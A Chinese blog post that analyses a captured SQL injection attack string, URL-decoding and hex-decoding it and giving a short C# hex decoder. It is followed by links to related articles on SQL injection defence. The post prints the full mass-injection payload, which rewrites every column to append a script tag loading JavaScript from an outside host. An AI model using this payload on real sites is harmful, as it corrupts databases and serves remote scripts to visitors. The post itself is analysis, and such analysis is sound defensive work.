C# 解密一段SQL注入脚本

最新推荐文章于 2021-03-31 22:33:17 发布
最新推荐文章于 2021-03-31 22:33:17 发布
阅读量157 收藏
点赞数
分类专栏: Security 文章标签: C C++ C# 脚本 SQL

大概输入的一段参数

exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f"

1:看到 %20%2b,很显然这是URLEncode,通过Server.UrlDecode方法解密得到
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') f

2:可以很清楚的看到cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)) 这段也是编过码的。看到ox开头应该是16进制。
最简单的方式是在MSSQL中运行

SELECT cast(0x223E223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))

就可以看到如下结果:

">"></title><script src=http://s.see9.us/s.js></script><!--

但为了以后方便。写了一段C#代码:
public static string Decode(string decode)
    {
        string result = "";
        for (int i = 0; i < decode.Length / 2; i++)
        {
            result += (char)short.Parse(decode.Substring(i * 2, 2), global::System.Globalization.NumberStyles.HexNumber);
        }
        return result;
    }

pumaboyd
关注
专栏目录
MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 342
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
ASP.NET(c#)防SQL注入脚本程序 v2.0 .rar
11-16
ASP.NET(c#)防SQL注入脚本程序 v2.0 .rar
C#过滤脚本注入3
weixin_34032779的博客
06-06 219
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL注入
liaoxiaohua1981的专栏
07-18 663
asp.net 防SQL注入一:一个方法        ///         ///SQL注入过滤        ///         /// 要过滤的字符串        /// 如果参数存在不安全字符,则返回true        public static bool SqlFilter2(string InText)        {            string word =
防止sql注入过滤器
erika_long的博客
02-23 183
[code="java"] import java.io.IOException; import java.util.Iterator; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.se...
ASP.net防SQL注入(简单)
02-02 144
一,验证方法 /// <summary>///SQL注入过滤/// </summary>/// <param name="InText">要过滤的字符串</param>/// &lt...
C#实现登陆程序(MD5加密和SQL存储过程防注入攻击)
03-20
在本文中,我们将深入探讨如何使用C#编程语言来实现一个登录程序,该程序结合了MD5加密技术和SQL存储过程,以确保用户密码的安全并防止SQL注入攻击。首先,我们来了解一下这两个关键技术。 MD5(Message-Digest ...
sql server 中进行des加密
07-25
在给定的文件名"SQLEncryption"中,可能包含示例代码、数据库脚本或相关的教程资源,这些资源可以帮助你更好地理解和实现SQL Server与C#中的DES加密和解密功能。在实践中,确保遵循最佳安全实践,如定期更换密钥,...
SQLServer中通过CLR实现URL与MD5的Unicode加解密
这些文件为用户提供了两种使用方式:无C#基础的用户可以直接执行SQL脚本来注册和使用这些函数,而有开发能力的用户则可以自行研究和修改源码以满足特定需求。" 执行操作所需的脚本包括: 1. 开启CLR功能脚本.sql:...
软件工程实验设计图书管理系统的设计思路与C#实现代码
最新发布
10-08
文章提供了简化版本的图书管理系统数据库设计脚本(图书表、用户表、借阅表),C#的数据访问层代码示例以及用户界面的简单实现,并阐述了软件开发生命周期的其它重要阶段。 适合人群:面向具有一定编程经验和软件...
ASP.NET 防止SQL注入式攻击
S.Sams`s Blog
04-17 1275
using System;namespace Theme.Services.Public{ ///  /// SqlstrAny 的摘要说明。 ///  public class ProcessRequest {  public ProcessRequest()  {   //   // TODO: 在此处添加构造函数逻辑   //  }  #region SQL注入式攻击代码分析  
转:PHP中防止SQL注入的方法
weixin_34258838的博客
10-08 792
【一、在服务器端配置】        安全,PHP代码编写是一方面,PHP的配置更是非常关键。我们php手手工安装的,php的默认配置文件在 /usr/local/apache2/conf/php.ini,我们最主要就是要配置php.ini中的内容,让我们执行 php能够更安全。整个PHP中的安全设置主要是为了防止phpshell和SQL Injection的攻击,一下我们慢慢探讨。我们先使用任...
sql防注入的方法
04-07 1277
///     /// 过滤标记    ///     /// 包括HTML,脚本,数据库关键字,特殊字符的源码     /// 已经去除标记后的文字    public static string NoHTML(string Htmlstring)    {        if (Htmlstring == null)        {            return "";       
C#跨站脚本防注入SXX
Xiang_Jie_的博客
05-26 710
//Global.asax里面插入代码 <%@ Application Language="C#" %> <script runat="server"> void Application_Start(object sender, EventArgs e) { //在应用程序启动时运行的代码 } void Application_End(object sender, EventArgs e) { //在应用
简单的ASP.net防SQL注入
暖阳的进步乐园
03-22 778
sql注入是每个开发人员都要考滤的问题asp.net有个Global.asax文件,有一个Application_BeginRequest方法(应用启动获取)就是当获取到参数时触发的事件;这里就是网站页面每次提交时都要经过的事件;在这里做防注入就一下子卡住入口了代码如下:protected void Application_BeginRequest(Object sender, EventArg
C#注入DLL-C#注入器
keepmoving0407的专栏
03-31 3545
今天一个朋友问我要c#注入器注入我的接口,于是我就写了这个程序 程序的界面很简单: 注入程序主要用到了系统的API,代码也不是很多,源码如下: using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Window.
Asp.Net 备份和恢复SQL SERVER 数据库
weixin_33691817的博客
06-25 349
我们通常备份数据库时,需要登录数据库服务器去备份和恢复,这样很不方便,其实SQL SERVER自带的命令可能让我们很简单地实现远程通过Asp.Net备份和恢复数据库。 BACKUPDATABASE'被备份的数据库名'TODISK='备份文件路径';ALTERDATABASE'被恢复的数据库名'SETOFFLINEWITHROOL...
ASP.NET 之 防SQL注入
weixin_30825199的博客
02-11 879
1. 什么是SQL注入 所谓SQL注入,就是通过把SQL命令插入到表单窗体递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行一些恶意的SQL命令。通过递交参数构造巧妙的SQL语句,从而成功获取想要的数据。 2. SQL注入的种类 从具体而言,SQL注入可分为五大类,分别是:数字型注入、字符型注入、搜索型注入(like)、in型的注入、句语连接型注入。 从应用来说,要...
ASP.net防止SQL注入方法
Time_Lover的专栏
09-20 506
SqlConnection conn=new SqlConnection(System.Configuration.ConfigurationSettings.AppSettings["conn"]); SqlCommand comm=new SqlCommand("update tb1 set vName=@vName,iAge=@iAge where ID=@id",conn); SqlP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值